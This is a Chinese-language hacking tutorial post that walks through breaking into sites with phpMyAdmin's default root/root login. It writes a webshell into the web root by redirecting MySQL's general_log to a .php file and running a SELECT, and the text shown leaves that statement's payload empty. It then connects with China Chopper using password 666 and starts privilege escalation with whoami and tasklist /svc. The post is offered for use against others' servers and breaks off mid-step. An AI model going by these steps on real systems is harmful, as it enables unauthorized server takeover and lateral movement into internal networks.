phpMyAdmin弱口令,从数据库杀到内网一条龙
超超超超超详细
ps:不混娱乐圈,mors是我大哥,不服喷他
什么是phpMyAdmin?
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
以上这些都不重要,重要的是能干什么?
phpMyAdmin在配置的时候,如果不去修改,默认账号密码就是root/root
什么?你问我他为什么不去修改?
不是每个人都懂这些的好吧?
看看有多少傻瓜式搭建网站的帖子就知道了
当初在帮别人改代码的时候
惊奇的发现源码里面有木马!
更可笑的是,还跟我说是特意这样写的!
着实把我逗笑了
偏偏小白们还看不出来
好了好了,言归正传
弱口令进了数据库我们能干嘛呢?
当然是拿shell啊
先找网站的根目录
一个是是否开启,一个是写入路径
general_log 一般是off,改成on
general_log_file C:\phpStudy\WWW\log.php
改成你喜欢的名字,比如:
general_log_file C:\phpStudy\WWW\123.php
执行一句话:
select ;
这样木马就被写入了123.php里面
密码是666,菜刀连接
原理就是,你执行的sql语句会被日志记录下来
拿到shell之后呢?当然是提权啦!
用shell打开虚拟终端
1.whoami看看啥权限
(有的是system权限,还有的可能是Administrator,还有比较鸡贼的,看似是Administrator,实际权限低的可怜)
2.tasklist /svc 找远程服务(Windows远程服务名称为:TermService)记录PID
3.net
评论